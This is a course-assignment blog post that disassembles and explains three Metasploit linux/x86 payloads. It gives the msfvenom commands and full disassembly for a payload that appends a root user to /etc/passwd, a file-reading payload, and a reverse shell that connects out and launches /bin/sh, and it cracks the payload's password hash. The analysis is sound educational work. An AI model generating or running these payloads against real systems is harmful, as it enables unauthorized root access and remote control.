SLAE A.5 - MSF Payload Analysis

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1294

This fifth assignment is to analyse in detail three linux/x86 shellcodes created with the Metasploit Framework. Full commands are shown for generating the samples. These are also archived in the GitHub repo.

Three payloads were investigated:

linux/x86/adduser
linux/x86/read_file
linux/x86/shell_reverse_tcp

linux/x86/adduser

I generated an example of this payload using default parameters. This created a file adduser.raw.

# msfvenom -f raw -a x86 -p linux/x86/adduser -o adduser.raw
/usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 97 bytes
Saved as: adduser.raw

Working through the disassembly from the beginning…

# ndisasm -b 32 adduser.raw
00000000  31C9              xor ecx,ecx
00000002  89CB              mov ebx,ecx

ECX and EBX are cleared to zero.

00000004  6A46              push byte +0x46
00000006  58                pop eax
00000007  CD80              int 0x80

This is a call to syscall 0x46 = 70, which is setreuid():

int setreuid(uid_t ruid, uid_t euid);

The two parameters are read from EBX and ECX, which are zero. This is a request to set the real and effective UIDs of the process to root (0).

This call is helpful when a process that was initially root drops its privileges temporarily (either on purpose or by error). It may still have 0 as its saved uid. In this case a call to setreuid() can restore the effective uid to 0. Errors are ignored.

00000009  6A05              push byte +0x5
0000000B  58                pop eax
0000000C  31C9              xor ecx,ecx
0000000E  51                push ecx

Set up a new syscall 5—open():

int open(const char *pathname, int flags);

It’s constructing the pathname on the stack. It begins by zeroing ECX and pushing it to create a null terminator.

0000000F  6873737764        push dword 0x64777373
00000014  682F2F7061        push dword 0x61702f2f
00000019  682F657463        push dword 0x6374652f
0000001E  89E3              mov ebx,esp

12 bytes of filename is pushed onto the stack. A pointer to this is stored in ebx. Equivalently:

char *filename = "\x2f\x65\x74\x63\x2f\x2f\x70\x61\x73\x73\x77\x64";

This is the string /etc//passwd. That’s the file it’s opening.

00000020  41                inc ecx
00000021  B504              mov ch,0x4

ECX is the flags parameter and until now it was 0. After these two operations it contains 0x0401. These flags are defined in the file /usr/include/i386-linux-gnu/bits/fcntl-linux.h. Unfortunately they are all in octal so I need to convert them. The two bits are 0x01 and 0x0400, or in octal 01 and 02000.

#define O_WRONLY             01
# define O_APPEND         02000

This means when the file is opened any writes will be placed at the end of the file. This makes sense since the shellcode will probably want to add an extra line for the new user.

00000023  CD80              int 0x80
00000025  93                xchg eax,ebx

The file is opened and the fd is stored in EBX. EAX now points to the file path but this is probably a side-effect. The xchg eax,ebx only requires 1 byte compared with 2 for mov ebx,eax.

00000026  E828000000        call 0x53

Now it gets interesting. The remainder of the shellcode is shown below. We are skipping over most of what’s left, and a lot of it looks like nonsense. This is probably data. The destination 0x53 is actually partway through an instruction so I need to disassemble this more carefully.

0000002B  6D                insd
0000002C  657461            gs jz 0x90
0000002F  7370              jnc 0xa1
00000031  6C                insb
00000032  6F                outsd
00000033  69743A417A2F6449  imul esi,[edx+edi+0x41],dword 0x49642f7a
0000003B  736A              jnc 0xa7
0000003D  3470              xor al,0x70
0000003F  3449              xor al,0x49
00000041  52                push edx
00000042  633A              arpl [edx],di
00000044  303A              xor [edx],bh
00000046  303A              xor [edx],bh
00000048  3A2F              cmp ch,[edi]
0000004A  3A2F              cmp ch,[edi]
0000004C  62696E            bound ebp,[ecx+0x6e]
0000004F  2F                das
00000050  7368              jnc 0xba
00000052  0A598B            or bl,[ecx-0x75]
00000055  51                push ecx
00000056  FC                cld
00000057  6A04              push byte +0x4
00000059  58                pop eax
0000005A  CD80              int 0x80
0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80

I re-run disassembly just from the location that was called onward. I need to skip the first 0x53 bytes so that I start on the “59” opcode.

# ndisasm -b 32 -k 0,0x53 adduser.raw
00000000  skipping 0x53 bytes
00000053  59                pop ecx
00000054  8B51FC            mov edx,[ecx-0x4]
00000057  6A04              push byte +0x4
00000059  58                pop eax
0000005A  CD80              int 0x80
0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80

I see now that it is doing a pop ecx. The call a moment ago pushed the next address—the start of the data chunk—onto the stack. So now the address of that data is in ECX.

Let’s look at what that data actually is. It’s from 0x2B to 0x53, for a total length of 0x28

# strings -t x adduser.raw
	e Qhsswdh//pah/etc
	2b metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh

This is clearly a hard-coded line designed to be written to the passwd file. The new user will have root privileges (user and group 0). The username will be metasploit. A crypted password is provided.

To find out what the password is we could just look at the payload options on msfvenom but we could also just bruteforce it.

root@kali:~/slae/assignments/a5-msf# cat >passwd
metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh
root@kali:~/slae/assignments/a5-msf# john passwd
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2])
Press 'q' or Ctrl-C to abort, almost any other key for status
metasplo         (metasploit)
1g 0:00:00:00 DONE 1/3 (2018-07-05 05:27) 100.0g/s 4200p/s 4200c/s 4200C/s metasplo..met4spl0
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So if this shellcode ran you could log on with metasploit/metasploit.

Moving along: we have a pointer to this string in ECX now.

00000054  8B51FC            mov edx,[ecx-0x4]
00000057  6A04              push byte +0x4
00000059  58                pop eax
0000005A  CD80              int 0x80

It is setting up a syscall number 4, which is write().

ssize_t write(int fd, const void *buf, size_t count);

We already have the fd in EBX from earlier. ECX was set up to point to buf by doing the call then the pop. The remaining parameter is EDX, the buffer length. This is read from 4 bytes before the ECX. That is the call instruction itself:

00000026  E828000000        call 0x53
            ^^^^^^^^ used as "count"

It isn’t an accident that 0x28 is the correct length—it was needed in order to neatly jump over it. So this is a clever way of inserting the length as part of an instruction to save space.

Note that this instruction contains null bytes so an encoding stage would probably be required to use this for normal shellcode purposes.

0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80

Finally, syscall number 1, which is exit(). The program will terminate immediately and the open passwd file will be closed. The program’s return code will be the file descriptor from EBX. Presumably the author doesn’t care about that.

In summary, this shellcode will:

Restore root privileges if they were dropped temporarily
Open /etc/passwd for appending new data
Write a new line for a user called “metasploit” with uid and gid 0
Exit the program

linux/x86/read_file

This one errors unless I choose a PATH. I’m going to choose /etc/passwd. I’ll try to work out the specifics without looking at the payload options.

# msfvenom -f raw -a x86 -p linux/x86/read_file -o read_file.raw PATH=/etc/passwd
/usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 73 bytes
Saved as: read_file.raw

Now disassembling it:

# ndisasm -b 32 read_file.raw
00000000  EB36              jmp short 0x38
00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80
0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80
0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80
0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80
00000038  E8C5FFFFFF        call 0x2
0000003D  2F                das
0000003E  657463            gs jz 0xa4
00000041  2F                das
00000042  7061              jo 0xa5
00000044  7373              jnc 0xb9
00000046  7764              ja 0xac
00000048  00                db 0x00

This shellcode begins with a jmp-call-pop sequence. From 0x3d onward just after the call looks like a null-terminated string. And it is:

# strings -t x read_file.raw
	3d /etc/passwd

So that data on the end is just the path that I set when generated the shellcode. The call 0x2 will push the address of this string onto the stack and jump up to 0x2.

Looking at the middle part in smaller chunks:

00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80

It sets up for syscall 5, which is open(). The address of the path is popped into EBX. The third parameter ECX is the flags, which is zeroed out. This will open the file for reading (O_RDONLY = 0).

0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80

Another syscall. The file descriptor returned by open() is moved to EBX. 0x3 is moved to EAX, which means this is performing a read().

ssize_t read(int fd, void *buf, size_t count);

The current stack pointer is moved first to EDI, then to ECX (the buf parameter). A hard-coded count of 0x1000 (4096 bytes) placed in EDX.

It is going to clobber whatever is currently on the stack with the first 4096 bytes of the file. It is not clear why EDI is used instead of moving ESP directly to ECX—neither ESP nor EDI is used again.

0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80

This is syscall 4, a write(). EBX is the fd to write to, which is 0x1 (STDOUT). The buffer is still in ECX. The length however is truncated to however many bytes were read by read()—that count was returned in EAX. So EDX is moved to EAX.

At this point the up-to-4096 bytes are written to STDOUT (unless fd 1 has been redirected elsewhere).

0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80

The shellcode finishes with the exit() syscall, causing the program to terminate immediately. It takes care to use a return code of 0.

In summary, this shellcode will:

Open a file at a hard-coded path
Read up to 4096 bytes onto the stack
Write those bytes out to STDOUT
Exit

linux/x86/shell_reverse_tcp

For a reverse shell I’m going to need to specify the IP and port to connect to. I will choose 127.1.1.1:4444.

# msfvenom -f raw -a x86 -p linux/x86/shell_reverse_tcp -o shell_reverse_tcp.raw LHOST=127.1.1.1 LPORT=4444
/usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Saved as: shell_reverse_tcp.raw

Going through the disassembly from the beginning:

# ndisasm -b 32 shell_reverse_tcp.raw
00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx

This is a trick to zero out 3 registers with 2 instructions. EBX is zeroed explicitly. mul ebx will perform EAX * EBX and store the result across EDX and EAX. The answer will always be 0 so EDX and EAX are now 0 also.

00000004  53                push ebx
00000005  43                inc ebx
00000006  53                push ebx
00000007  6A02              push byte +0x2
00000009  89E1              mov ecx,esp
0000000B  B066              mov al,0x66
0000000D  CD80              int 0x80

It sets up for syscall 0x66 = 102, which is socketcall(). I haven’t seen this before. Relevant snippets from the man page:

int socketcall(int call, unsigned long *args);

“socketcall() is a common kernel entry point for the socket system calls. call determines which socket function to invoke. args points to a block containing the actual arguments, which are passed through to the appropriate call.”

I located the constants for the call numbers in /usr/include/linux/net.h. EBX will be incremented to 1, and there is a corresponding constant:

#define SYS_SOCKET      1               /* sys_socket(2)                */

So this is just a compact way of calling socket(2). It can push the arguments onto the stack and pass the stack pointer as ECX.

It pushes the arguments in reverse order for socket(). These constants were explored thoroughly in assignment 1.

The number 0—”protocol” which is always 0 for TCP sockets
The number 1—”type”, SOCK_STREAM
The number 2—”domain”, AF_INET

In summary, this is going to open a AF_INET socket and an fd will be returned in EAX.

0000000F  93                xchg eax,ebx
00000010  59                pop ecx
00000011  B03F              mov al,0x3f
00000013  CD80              int 0x80

The syscall number is updated to 0x3f = 63, or dup2(). As seen in assignment 2, file descriptors will need to be redirected before launching the shell.

EBX is the oldfd to be duplicated. It is set to the socket that was just returned in EAX.

ECX is the newfd to be replaced. It pops the 0x2 off the stack, taking advantage of the fact that both AF_INET and the STDERR file descriptor are the number 2.

It executes dup2(), so now any STDERR output will be diverted to the (as yet unconnected) socket.

00000015  49                dec ecx
00000016  79F9              jns 0x11

The newfd is decremented from 2 to 1. As long as this doesn’t produce a negative jumber, JNS will perform a jump. It will go back to 0x11, which sets the syscall number and runs dup2() again. Now STDOUT is also diverted to the socket.

newfd decrements from 1 to 0. The sign flag is still not set so it loops again and STDIN is diverted to the socket.

Finally it decrements to -1. JNS does nothing and execution continues.

00000018  687F010101        push dword 0x101017f
0000001D  680200115C        push dword 0x5c110002
00000022  89E1              mov ecx,esp
00000024  B066              mov al,0x66
00000026  50                push eax
00000027  51                push ecx
00000028  53                push ebx
00000029  B303              mov bl,0x3
0000002B  89E1              mov ecx,esp
0000002D  CD80              int 0x80

Next, a variety of data is arranged on the stack before using socketcall again. Looking at the bottom first, this time EBX is set to 0x3. This corresponds to the call:

#define SYS_CONNECT     3               /* sys_connect(2)               */

It is now effectively doing a connect(), but it is going via this syscall that takes its arguments via a pointer to memory.

Looking back at the top of this section it first prepares a struct sockaddr_in on the stack. Only the first 8 bytes are relevant so it pushes 8 bytes.

push dword 0x101017f

This is the packed IP address 127.1.1.1. (Read each byte in reverse order)

push dword 0x5c110002

0x0002 = AF_INET (address family is in little endian)
0x5c11 = 4444 in network byte order = big endian

connect() will need a pointer to the struct. It is currently located at the top of the stack so ESP is saved to ECX temporarily.

The three parameters to connect() are pushed in reverse order:

EAX = addrlen = 0x66. Presumably having an addrlen that is larger than actually required is fine.
ECX = addr = pointer to the struct sockaddr_in
EBX = sockfd = the fd returned from the previous “socket” call

With any luck, when it returns, a TCP connection has been established to the remote listener.

0000002F  52                push edx
00000030  686E2F7368        push dword 0x68732f6e
00000035  682F2F6269        push dword 0x69622f2f
0000003A  89E3              mov ebx,esp
0000003C  52                push edx
0000003D  53                push ebx
0000003E  89E1              mov ecx,esp
00000040  B00B              mov al,0xb
00000042  CD80              int 0x80

The remaining shellcode appears to assume that the connection succeeded. (It doesn’t have many options, after all.) Looking just before the int 0x80, it is setting up the syscall 0xb = 11 which is execve(). This is familiar code.

EDX has contained 0 since the very beginning. It is pushed to the stack to provide a null termination for the path string. Due to pushing backwards and endianness the path must be read backwards: “\x2f\x2f\x62\x69\x6e\x2f\x73\x68”. This is the string //bin/sh, now on top of the stack.

ESP is stored into EBX to act as the path of the program to be executed.

Another null is placed on the stack, followed by a pointer to the path. Together, this is the argv array. ESP is stored into ECX, so it now contains a pointer to the array.

EDX = envp is permitted to remain null.

Finally the execve() is called. The new program will replace the current one and control will never return here. It will inherit the TCP connection and file descriptors so all STDIN and STDOUT will be received and sent over the network.

In summary, this shellcode will:

Obtain an AF_INET socket
Redirect STDIN/OUT/ERR to that socket
Make a TCP connection to a hardcoded IP and port
Execute /bin/sh